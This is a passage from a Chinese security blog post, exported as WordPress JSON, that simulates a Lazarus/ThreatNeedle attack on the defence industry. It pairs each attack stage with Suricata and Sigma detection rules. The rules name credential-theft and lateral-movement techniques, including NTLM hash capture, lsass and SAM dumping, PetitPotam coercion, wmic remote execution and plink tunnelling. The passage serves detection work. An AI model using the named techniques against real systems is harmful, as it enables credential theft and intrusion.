id=\"1%EF%BC%89%E4%BB%8E%E6%B3%A8%E5%86%8C%E8%A1%A8%E4%B8%AD%E8%AF%BB%E5%8F%96%E9%85%8D%E7%BD%AE%E5%B9%B6%E4%B8%94%E8%A7%A3%E5%AF%86\"><\/span>1\uff09\u4ece\u6ce8\u518c\u8868\u4e2d\u8bfb\u53d6\u914d\u7f6e\u5e76\u4e14\u89e3\u5bc6<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<h6 data-diff-id=\"ct-diff-id-OLv8DUYP\"><span class=\"ez-toc-section\" id=\"2%EF%BC%89%E8%A7%A3%E5%AF%86payload%E5%90%8E%E4%BB%8E%E5%86%85%E5%AD%98%E4%B8%AD%E5%8A%A0%E8%BD%BD\"><\/span>2\uff09\u89e3\u5bc6payload\u540e\u4ece\u5185\u5b58\u4e2d\u52a0\u8f7d<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<\/div>\n<h5 data-diff-id=\"ct-diff-id-FMr3ZuiY\"><span class=\"ez-toc-section\" id=\"5%E3%80%81ThreatNeedle%E5%90%8E%E9%97%A8%E8%A1%8C%E4%B8%BA\"><\/span>5\u3001ThreatNeedle\u540e\u95e8\u884c\u4e3a<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<div class=\"penci-tpadding-2\">\n<h6 data-diff-id=\"ct-diff-id-iouOZxtg\"><span class=\"ez-toc-section\" id=\"1%EF%BC%89%E6%96%87%E4%BB%B6%E6%B5%8F%E8%A7%88%E4%B8%8E%E6%93%8D%E4%BD%9C%EF%BC%8C%E6%95%8F%E6%84%9F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96\"><\/span>1\uff09\u6587\u4ef6\u6d4f\u89c8\u4e0e\u64cd\u4f5c\uff0c\u654f\u611f\u6587\u4ef6\u8bfb\u53d6<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<h6 data-diff-id=\"ct-diff-id-iPS9i2FD\"><span class=\"ez-toc-section\" id=\"2%EF%BC%89%E8%BF%9C%E6%8E%A7%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4%E8%A1%8C\"><\/span>2\uff09\u8fdc\u63a7\u6267\u884c\u547d\u4ee4\u884c<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<p data-diff-id=\"ct-diff-id-iPS9i2FD\">\u53c2\u8003\u6587\u7ae0\uff1a<a href=\"http:\/\/weizn.net\/?p=825\">\u901a\u7528\u6a21\u578b\u68c0\u6d4b\u8fdc\u63a7\u6728\u9a6c\u6267\u884c\u4ea4\u4e92\u5f0fCMDSHELL<\/a><\/p>\n<\/div>\n<h5 data-diff-id=\"ct-diff-id-u7CpOBnD\"><span class=\"ez-toc-section\" id=\"6%E3%80%81%E5%87%AD%E6%8D%AE%E6%94%B6%E9%9B%86\"><\/span>6\u3001\u51ed\u636e\u6536\u96c6<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<h6 class=\"penci-tpadding-2\"><span class=\"ez-toc-section\" id=\"1%EF%BC%89responder%E5%87%AD%E6%8D%AE%E9%87%87%E9%9B%86%E5%B7%A5%E5%85%B7\"><\/span>1\uff09responder\u51ed\u636e\u91c7\u96c6\u5de5\u5177<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<div>\n<div class=\"penci-tpadding-2\">\u57fa\u4e8eSuricata\u89c4\u5219\u68c0\u6d4b\u6d41\u91cf\u7279\u5f81\uff1a<\/div>\n<div>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">alert tcp any [139,445] -&gt; $HOME_NET any (msg:\"Suspicious Microsoft NTLM SSP Challenge Value Detected - Inbound (NTLM Hash Theft Attempt)\"; flow:established,to_client; content:\"SMB\"; depth:9; content:\"NTLMSSP|00 02 00 00 00|\"; distance:64; content:\"|12 34 56 78 ab cd ef 00|\"; distance:12; within:8; fast_pattern; priority:2; rev:2; sid:20055982;)\r\nalert tcp any [139,445] -&gt; $HOME_NET any (msg:\"Suspicious Microsoft NTLM SSP Challenge Value Detected - Inbound (NTLM Hash Theft Attempt)\"; flow:established,to_client; content:\"SMB\"; depth:9; content:\"NTLMSSP|00 02 00 00 00|\"; distance:64; content:\"|11 22 33 44 55 66 77 88|\"; distance:12; within:8; fast_pattern; priority:2; rev:2; sid:20055964;)\r\nalert tcp any [139,445] -&gt; $HOME_NET any (msg:\"Suspicious Microsoft NTLM SSP Challenge Value Detected - Inbound (NTLM Hash Theft Attempt)\"; flow:established,to_client; content:\"SMB\"; depth:9; content:\"NTLMSSP|00 02 00 00 00|\"; distance:64; content:\"|41 41 41 41 41 41 41 41|\"; distance:12; within:8; fast_pattern; priority:2; rev:2; sid:20055963;)<\/pre>\n<\/div>\n<\/div>\n<h6 class=\"penci-tpadding-2\"><span class=\"ez-toc-section\" id=\"2%EF%BC%89%E5%BC%BA%E5%88%B6%E8%AE%A4%E8%AF%81\"><\/span>2\uff09\u5f3a\u5236\u8ba4\u8bc1<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<div>\n<div class=\"penci-tpadding-2\">\u4f8b\u5982\u4f7f\u7528PetitPotam\u6216SpoolSample\u653b\u51fb\u3002<\/div>\n<\/div>\n<div>\n<div class=\"penci-tpadding-2\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># \u7591\u4f3cPetitpotam\u653b\u51fb\u5efa\u7acbIPC\u7ba1\u9053\r\ndetection:\r\n    eventid:\r\n        event_id: \"5145\"\r\n    selection1:\r\n        event_data.AccessMask: '0x3'\r\n        event_data.ShareName: '*IPC$'\r\n    selection2:\r\n        event_data.RelativeTargetName:\r\n            - 'efsr'\r\n            - 'lsarpc'\r\n            - 'samr'\r\n            - 'netlogon'\r\n            - 'lsass'\r\n    condition: all of them<\/pre>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># \u7591\u4f3c\u653b\u51fb\u6253\u5370\u673a\u670d\u52a1\r\ndetection:\r\n    selection1:\r\n        event_id: 5145\r\n    selection2:\r\n        event_data.RelativeTargetName: \"spoolss\"\r\n        event_data.AccessMask: '0x3'\r\n    condition: all of them<\/pre>\n<\/div>\n<\/div>\n<h6 class=\"penci-tpadding-2\"><span class=\"ez-toc-section\" id=\"3%EF%BC%89%E5%85%B6%E5%AE%83%E6%9C%AC%E5%9C%B0%E5%87%AD%E6%8D%AE%E9%87%87%E9%9B%86%E6%96%B9%E5%BC%8F\"><\/span>3\uff09\u5176\u5b83\u672c\u5730\u51ed\u636e\u91c7\u96c6\u65b9\u5f0f<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<div>\n<div class=\"penci-tpadding-2\">\u4e00\u79cd\u65b9\u5f0f\u662fdump hash\u540e\u79bb\u7ebf\u7834\u89e3\uff0c\u53e6\u4e00\u79cd\u65b9\u5f0f\u662f\u5728\u5185\u5b58\u4e2d\u76f4\u63a5dump\u51fa\u660e\u6587\u5bc6\u7801\uff0c\u76d1\u63a7\u70b9\u53ef\u4ee5\u662fdump\u51ed\u636e\u6267\u884c\u7684\u547d\u4ee4\u884c\uff0c\u5bf9lsass.exe\u8fdb\u7a0b\u7684\u5f02\u5e38\u63d0\u6743\uff0c\u6216\u8005dump\u5185\u5b58\u65f6\u521b\u5efa\u7684\u4e34\u65f6\u6587\u4ef6\uff0c\u4e3e\u4f8b\u5982\uff1a<\/div>\n<div>\n<div class=\"penci-tpadding-2\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># \u901a\u8fc7Reg.exe\u8f6c\u50a8SAM\u8868\u9879\r\ndetection:\r\n    selection1:\r\n        EventID: 1\r\n        event_data.OriginalFileName: 'reg.exe'\r\n    selection2:\r\n        event_data.CommandLine:\r\n            - '* save *'\r\n            - '* export *'\r\n    selection3:\r\n        event_data.CommandLine:\r\n            - '*hklm*'\r\n            - '*hkey_local_machine*'\r\n    selection4:\r\n        event_data.CommandLine:\r\n            - '*\\sam *'\r\n            - '*\\security *'\r\n            - '*\\system *'\r\n    condition: all of them<\/pre>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># \u53d1\u73b0lsass\u8fdb\u7a0b\u5185\u5b58\u88abdump\r\ndetection:\r\n    selection1:\r\n        EventID: 11\r\n        event_data.TargetFilename:\r\n            - '*lsass*.dmp'\r\n            - '*lsass*.dump'\r\n    condition: selection1<\/pre>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"penci-tpadding-2\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># \u53d1\u73b0\u9488\u5bf9\u654f\u611f\u8fdb\u7a0b\u7684\u5f02\u5e38\u63d0\u6743\u884c\u4e3a\r\ndetection:\r\n    selection1:\r\n        EventID: 10\r\n        event_data.GrantedAccess: \"0x1010\"\r\n    selection2:\r\n        event_data.TargetImage:\r\n            - \"*lsass.exe\"\r\n    filter:\r\n        event_data.SourceImage:\r\n            - \"*windows defender*\"\r\n            - '*\\microsoft security client\\*'\r\n            - '*\\kingsoft\\*'\r\n            - '*\\360*'\r\n            - '*\\wegame\\*'\r\n            - '*\\wechat\\*'\r\n            - '*\\appdata\\*'\r\n            - '*\\spool\\*'\r\n            - '*\\program*'\r\n    condition: selection1 and selection2 and not filter<\/pre>\n<\/div>\n<h5 data-diff-id=\"ct-diff-id-OPRZID6x\"><span class=\"ez-toc-section\" id=\"7%E3%80%81%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8\"><\/span>7\u3001\u6a2a\u5411\u79fb\u52a8<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<div class=\"penci-tpadding-2\">\n<h6 data-diff-id=\"ct-diff-id-PuQ6JS93\"><span class=\"ez-toc-section\" id=\"1%EF%BC%89%E5%91%BD%E4%BB%A4%E5%88%9B%E5%BB%BAIPC%E5%91%BD%E5%90%8D%E7%AE%A1%E9%81%93\"><\/span>1\uff09\u547d\u4ee4\u521b\u5efaIPC\u547d\u540d\u7ba1\u9053<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># \u4f7f\u7528net.exe\u8fdc\u7a0b\u5efa\u7acbWindows_IPC\u547d\u540d\u7ba1\u9053\r\ndetection:\r\n    selection1:\r\n        event_id: 1\r\n    selection2:\r\n        event_data.OriginalFileName:\r\n            - 'net.exe'\r\n            - 'net1.exe'\r\n    selection3:\r\n        event_data.CommandLine:\r\n            - '* use *\\\\\\*\\IPC$*\/u*:*'\r\n            - '* use *\\\\\\*\/IPC$*\/u*:*'\r\n    condition: all of them<\/pre>\n<h6 data-diff-id=\"ct-diff-id-mEWwyb36\"><span class=\"ez-toc-section\" id=\"2%EF%BC%89wmi%E5%91%BD%E4%BB%A4%E8%BF%9C%E7%A8%8B%E8%B0%83%E7%94%A8%E6%81%B6%E6%84%8F%E6%96%87%E4%BB%B6\"><\/span>2\uff09wmi\u547d\u4ee4\u8fdc\u7a0b\u8c03\u7528\u6076\u610f\u6587\u4ef6<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># WMI\u6267\u884c\u8fdc\u7a0b\u7ba1\u7406\u547d\u4ee4\r\ndetection:\r\n    selection1:\r\n        event_id: 1\r\n    selection2:\r\n        event_data.OriginalFileName: 'wmic.exe'\r\n    selection3:\r\n        event_data.CommandLine:\r\n            - '*process *call *create *'\r\n    select4:\r\n        event_data.CommandLine: '* \/user *'\r\n    select5:\r\n        event_data.CommandLine: '* \/password *'\r\n    select6:\r\n        event_data.CommandLine: '* \/node *'\r\n    condition: all of them<\/pre>\n<h6 data-diff-id=\"ct-diff-id-rHrGSsvF\"><span class=\"ez-toc-section\" id=\"3%EF%BC%89%E7%99%BB%E5%BD%95%E6%88%90%E5%8A%9F%E5%A4%9A%E5%8F%B0windows_server\"><\/span>3\uff09\u767b\u5f55\u6210\u529f\u591a\u53f0windows server<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># 4624\u8fdc\u7a0b\u767b\u5f55\u6210\u529f\r\ndetection:\r\n    selection1:\r\n        event_id: 4624\r\n        event_data.LogonType: \"3\"\r\n        event_data.AuthenticationPackageName: 'ntlm'\r\n    selection2:\r\n        event_data.IpAddress:\r\n            - '10.*'\r\n            - '192.168.*'\r\n            - '172.16.*'\r\n            - '172.17.*'\r\n            - '172.18.*'\r\n            - '172.19.*'\r\n            - '172.20.*'\r\n            - '172.21.*'\r\n            - '172.22.*'\r\n            - '172.23.*'\r\n            - '172.24.*'\r\n            - '172.25.*'\r\n            - '172.26.*'\r\n            - '172.27.*'\r\n            - '172.28.*'\r\n            - '172.29.*'\r\n            - '172.30.*'\r\n            - '172.31.*'\r\n\r\n            # \u90e8\u5206\u4f01\u4e1a\u79c1\u6709\u5730\u5740\u4e0d\u591f\u7528\uff0c\u4f1a\u5728\u8def\u7531\u4e0a\u4fee\u6539\u8fd9\u4e2a\u7f51\u6bb5\u4e3a\u79c1\u6709\u5730\u5740\r\n            - '11.*'\r\n    filter:\r\n        computer_name:\r\n            # \u8fc7\u6ee4\u6253\u5370\u673a\r\n            - \"*print*\"\r\n    condition: selection1 and selection2 and not filter<\/pre>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># \u53d1\u73b0\u6e90\u4e3b\u673a\u8fdc\u7a0b\u767b\u5f55\u6210\u529f\u591a\u4e2aWindows\u673a\u5668\r\nepl: '\r\n@name(\"\u53d1\u73b0\u6e90\u4e3b\u673a\u767b\u5f55\u6210\u529f\u591a\u4e2aWindows\u673a\u5668_\u521b\u5efa\u7a97\u53e3\")\r\n@public\r\ncreate window a9ebeac45532e1c_Window_4624#groupwin(\r\nevent_data_ipaddress)#unique(\r\nevent_data_ipaddress, event_data_targetusername, host_ip)#time(10 min) as\r\nselect\r\nevent_data_ipaddress,\r\nevent_data_targetusername,\r\nhost_ip\r\nfrom SigmaAlerts;\r\n\r\n\r\n@name(\"\u53d1\u73b0\u6e90\u4e3b\u673a\u767b\u5f55\u6210\u529f\u591a\u4e2aWindows\u673a\u5668_\u5199\u5165\u7f13\u5b58\u6570\u636e\")\r\ninsert into a9ebeac45532e1c_Window_4624 select\r\nevent_data_ipaddress,\r\nevent_data_targetusername,\r\nhost_ip\r\nfrom SigmaAlerts\r\nwhere\r\nalert_signature = \"4624\u8fdc\u7a0b\u767b\u5f55\u6210\u529f\" and\r\nevent_data_targetusername != \"anonymous logon\";\r\n\r\n\r\n@name(\"\u53d1\u73b0\u6e90\u4e3b\u673a\u767b\u5f55\u6210\u529f\u591a\u4e2aWindows\u673a\u5668_\u6267\u884c\u67e5\u8be2\")\r\non pattern[every timer:interval(5 sec)]\r\nselect\r\nevent_data_ipaddress,\r\ncount(distinct host_ip) as diff_cnt\r\nfrom a9ebeac45532e1c_Window_4624\r\ngroup by\r\nevent_data_ipaddress\r\nhaving count(distinct host_ip) &gt;= 3;\r\n\r\n'<\/pre>\n<\/div>\n<h5 data-diff-id=\"ct-diff-id-7RAyHIRT\"><span class=\"ez-toc-section\" id=\"8%E3%80%81%E6%8E%A7%E5%88%B6%E4%BA%86IT%E7%AE%A1%E7%90%86%E5%91%98%E7%9A%84%E6%9C%BA%E5%99%A8%EF%BC%8Cdump%E6%B5%8F%E8%A7%88%E5%99%A8%E5%87%AD%E6%8D%AE\"><\/span>8\u3001\u63a7\u5236\u4e86IT\u7ba1\u7406\u5458\u7684\u673a\u5668\uff0cdump\u6d4f\u89c8\u5668\u51ed\u636e<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<h5 data-diff-id=\"ct-diff-id-5Py11WCp\"><span class=\"ez-toc-section\" id=\"9%E3%80%81%E5%9C%A8%E5%91%98%E5%B7%A5%E7%94%B5%E8%84%91%E4%B8%8A%E4%BD%BF%E7%94%A8PuTTyPSCP%E5%B7%A5%E5%85%B7%E4%B8%8A%E4%BC%A0%E6%81%B6%E6%84%8F%E8%BD%AF%E4%BB%B6%E5%88%B0server\"><\/span>9\u3001\u5728\u5458\u5de5\u7535\u8111\u4e0a\u4f7f\u7528PuTTyPSCP\u5de5\u5177\u4e0a\u4f20\u6076\u610f\u8f6f\u4ef6\u5230server<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># \u7591\u4f3c\u4f7f\u7528PuTTyPSCP\u5de5\u5177\u8fdc\u7a0b\u4f20\u8f93\u6587\u4ef6\r\ndetection:\r\n    selection1:\r\n        event_id: 1\r\n    selection2:\r\n        event_data.CommandLine:\r\n            - regex:(?i).*\\s+[a-z0-9_\\.]{1,15}@\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:(\/|\\.|~).{1,20}\\s+.*(\\\\|\/|\\.).*\r\n            - regex:(?i).*\\s+.*(\\\\|\/|\\.).*\\s+[a-z0-9_\\.]{1,15}@\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:(\/|\\.|~).{1,20}\r\n    condition: all of them<\/pre>\n<h5 data-diff-id=\"ct-diff-id-e3DaCezf\"><span class=\"ez-toc-section\" id=\"10%E3%80%81NMAP%E6%89%AB%E6%8F%8F%E4%BA%86%E9%9A%94%E7%A6%BB%E7%BD%91%E6%AE%B5%E4%B8%AD%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%BC%80%E6%94%BE%E7%AB%AF%E5%8F%A3\"><\/span>10\u3001NMAP\u626b\u63cf\u4e86\u9694\u79bb\u7f51\u6bb5\u4e2d\u7cfb\u7edf\u7684\u5f00\u653e\u7aef\u53e3<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<h5 data-diff-id=\"ct-diff-id-Os9dG7CG\"><span class=\"ez-toc-section\" id=\"11%E3%80%81linux%E4%B8%8A%E6%97%A5%E5%BF%97%E6%96%87%E4%BB%B6%E6%9F%A5%E7%9C%8B%EF%BC%8C%E4%BB%A5%E5%8F%8A%E9%80%9A%E8%BF%87rm%E5%91%BD%E4%BB%A4%E6%B8%85%E9%99%A4\"><\/span>11\u3001linux\u4e0a\u65e5\u5fd7\u6587\u4ef6\u67e5\u770b\uff0c\u4ee5\u53ca\u901a\u8fc7rm\u547d\u4ee4\u6e05\u9664<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<h5 data-diff-id=\"ct-diff-id-Cvln6zR0\"><span class=\"ez-toc-section\" id=\"12%E3%80%81%E4%BD%BF%E7%94%A8logrotate%E5%B7%A5%E5%85%B7%E6%B8%85%E9%99%A4linux%E6%97%A5%E5%BF%97\"><\/span>12\u3001\u4f7f\u7528logrotate\u5de5\u5177\u6e05\u9664linux\u65e5\u5fd7<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<h5 data-diff-id=\"ct-diff-id-iF0xBRLu\"><span class=\"ez-toc-section\" id=\"13%E3%80%81http%E4%BB%A3%E7%90%86%E7%9A%84%E4%BD%BF%E7%94%A8%EF%BC%8C%E7%AA%81%E7%A0%B4%E9%9A%94%E7%A6%BB%E7%BD%91%E6%AE%B5%E6%B8%97%E5%87%BA%E6%95%B0%E6%8D%AE\"><\/span>13\u3001http\u4ee3\u7406\u7684\u4f7f\u7528\uff0c\u7a81\u7834\u9694\u79bb\u7f51\u6bb5\u6e17\u51fa\u6570\u636e<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<h5 data-diff-id=\"ct-diff-id-BASeGHkU\"><span class=\"ez-toc-section\" id=\"14%E3%80%81%E5%9C%A8%E8%A2%AB%E6%8E%A7server%E4%B8%8A%E9%80%9A%E8%BF%87ssh%E5%88%9B%E5%BB%BA%E5%88%B0%E5%A4%96%E7%BD%91%E7%9A%84ssh%E9%9A%A7%E9%81%93\"><\/span>14\u3001\u5728\u88ab\u63a7server\u4e0a\u901a\u8fc7ssh\u521b\u5efa\u5230\u5916\u7f51\u7684ssh\u96a7\u9053<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># \u7591\u4f3c\u4f7f\u7528plink\u5de5\u5177\u521b\u5efa\u96a7\u9053\r\ndetection:\r\n    selection1:\r\n        event_id: 1\r\n    selection2:\r\n        event_data.CommandLine:\r\n            - regex:(?i).*\\s+\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:\\d{1,5}:\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:\\d{1,5}.*\r\n    selection3:\r\n        event_data.CommandLine:\r\n            - regex:(?i).*\\s+[a-z0-9_\\.]{1,15}@.*\\..*\r\n    selection4:\r\n        event_data.CommandLine: '* -N *'\r\n    condition: all of them<\/pre>\n<h5 data-diff-id=\"ct-diff-id-ftyRoz3H\"><span class=\"ez-toc-section\" id=\"15%E3%80%81PuTTyPSCP%E5%B7%A5%E5%85%B7%E6%B8%97%E5%87%BA%E6%95%B0%E6%8D%AE\"><\/span>15\u3001PuTTyPSCP\u5de5\u5177\u6e17\u51fa\u6570\u636e<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<p>\u540c9<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Lazarus\u88ab\u79f0\u4e4b\u4e3a\u4e3a2020\u5e74\u6700\u6d3b\u8dc3\u7684APT\u7ec4\u7ec7\uff0c\u5728\u653b\u51fb\u4e2d\u4f7f\u7528\u7684\u6076\u610f\u8f6f\u4ef6\u5c5e\u4e8e\u4e00\u4e2a\u88ab\u547d\u540d\u4e3aThreatNeedle\u7684\u5bb6\u65cf\u3002Lazarus\u66fe\u4f7f\u7528\u8fd9\u4e2a\u6076\u610f\u8f6f\u4ef6\u653b\u51fb\u5404\u4e2a\u884c\u4e1a\u3002\u57282020\u5e74\u4e2d\u671f\uff0c\u6355\u83b7\u5230Lazarus\u6b63\u5728\u4f7f\u7528ThreatNeedle\u5bf9\u56fd\u9632\u5de5\u4e1a\u53d1\u8d77\u653b\u51fb\uff0c\u5230\u76ee\u524d\u4e3a\u6b62\uff0c\u5df2\u7ecf\u6709\u5341\u51e0\u4e2a\u56fd\u5bb6\u7684\u7ec4\u7ec7\u53d7\u5230\u5f71\u54cd\u3002<\/p>\n","protected":false},"author":1,"featured_media":818,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[321],"tags":[356,357],"class_list":["post-780","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","tag-apt","tag-357"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v16.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>APT\u653b\u9632\u63a8\u6f14\uff1aLazarus\u7ec4\u7ec7\u9488\u5bf9\u56fd\u9632\u5de5\u4e1a\u7684\u4e00\u6b21\u653b\u51fb - Wayne&#039;s Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/weizn.net\/?p=780\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"APT\u653b\u9632\u63a8\u6f14\uff1aLazarus\u7ec4\u7ec7\u9488\u5bf9\u56fd\u9632\u5de5\u4e1a\u7684\u4e00\u6b21\u653b\u51fb - Wayne&#039;s Blog\" \/>\n<meta property=\"og:description\" content=\"Lazarus\u88ab\u79f0\u4e4b\u4e3a\u4e3a2020\u5e74\u6700\u6d3b\u8dc3\u7684APT\u7ec4\u7ec7\uff0c\u5728\u653b\u51fb\u4e2d\u4f7f\u7528\u7684\u6076\u610f\u8f6f\u4ef6\u5c5e\u4e8e\u4e00\u4e2a\u88ab\u547d\u540d\u4e3aThreatNeedle\u7684\u5bb6\u65cf\u3002Lazarus\u66fe\u4f7f\u7528\u8fd9\u4e2a\u6076\u610f\u8f6f\u4ef6\u653b\u51fb\u5404\u4e2a\u884c\u4e1a\u3002\u57282020\u5e74\u4e2d\u671f\uff0c\u6355\u83b7\u5230Lazarus\u6b63\u5728\u4f7f\u7528ThreatNeedle\u5bf9\u56fd\u9632\u5de5\u4e1a\u53d1\u8d77\u653b\u51fb\uff0c\u5230\u76ee\u524d\u4e3a\u6b62\uff0c\u5df2\u7ecf\u6709\u5341\u51e0\u4e2a\u56fd\u5bb6\u7684\u7ec4\u7ec7\u53d7\u5230\u5f71\u54cd\u3002\" \/>\n<meta property=\"og:url\" content=\"http:\/\/weizn.net\/?p=780\" \/>\n<meta property=\"og:site_name\" content=\"Wayne&#039;s Blog\" \/>\n<meta property=\"article:published_time\" content=\"2021-08-20T09:20:48+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-08-25T09:18:00+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/lazarusgroup.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"1250\" \/>\n\t<meta property=\"og:image:height\" content=\"460\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"zinan\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"http:\/\/weizn.net\/#website\",\"url\":\"http:\/\/weizn.net\/\",\"name\":\"Wayne&#039;s Blog\",\"description\":\"\",\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/weizn.net\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"ImageObject\",\"@id\":\"http:\/\/weizn.net\/?p=780#primaryimage\",\"inLanguage\":\"zh-Hans\",\"url\":\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/lazarusgroup.jpeg\",\"contentUrl\":\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/lazarusgroup.jpeg\",\"width\":1250,\"height\":460},{\"@type\":\"WebPage\",\"@id\":\"http:\/\/weizn.net\/?p=780#webpage\",\"url\":\"http:\/\/weizn.net\/?p=780\",\"name\":\"APT\\u653b\\u9632\\u63a8\\u6f14\\uff1aLazarus\\u7ec4\\u7ec7\\u9488\\u5bf9\\u56fd\\u9632\\u5de5\\u4e1a\\u7684\\u4e00\\u6b21\\u653b\\u51fb - Wayne&#039;s Blog\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/#website\"},\"primaryImageOfPage\":{\"@id\":\"http:\/\/weizn.net\/?p=780#primaryimage\"},\"datePublished\":\"2021-08-20T09:20:48+00:00\",\"dateModified\":\"2021-08-25T09:18:00+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/weizn.net\/?p=780#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/weizn.net\/?p=780\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/weizn.net\/?p=780#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\\u9996\\u9875\",\"item\":\"http:\/\/weizn.net\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"APT\\u653b\\u9632\\u63a8\\u6f14\\uff1aLazarus\\u7ec4\\u7ec7\\u9488\\u5bf9\\u56fd\\u9632\\u5de5\\u4e1a\\u7684\\u4e00\\u6b21\\u653b\\u51fb\"}]},{\"@type\":\"Article\",\"@id\":\"http:\/\/weizn.net\/?p=780#article\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/?p=780#webpage\"},\"author\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"headline\":\"APT\\u653b\\u9632\\u63a8\\u6f14\\uff1aLazarus\\u7ec4\\u7ec7\\u9488\\u5bf9\\u56fd\\u9632\\u5de5\\u4e1a\\u7684\\u4e00\\u6b21\\u653b\\u51fb\",\"datePublished\":\"2021-08-20T09:20:48+00:00\",\"dateModified\":\"2021-08-25T09:18:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"http:\/\/weizn.net\/?p=780#webpage\"},\"wordCount\":190,\"commentCount\":0,\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"image\":{\"@id\":\"http:\/\/weizn.net\/?p=780#primaryimage\"},\"thumbnailUrl\":\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/lazarusgroup.jpeg\",\"keywords\":[\"APT\",\"\\u653b\\u9632\\u63a8\\u6f14\"],\"articleSection\":[\"\\u5e94\\u7528\\u5b89\\u5168\"],\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"http:\/\/weizn.net\/?p=780#respond\"]}]},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\",\"name\":\"zinan\",\"logo\":{\"@id\":\"http:\/\/weizn.net\/#personlogo\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. 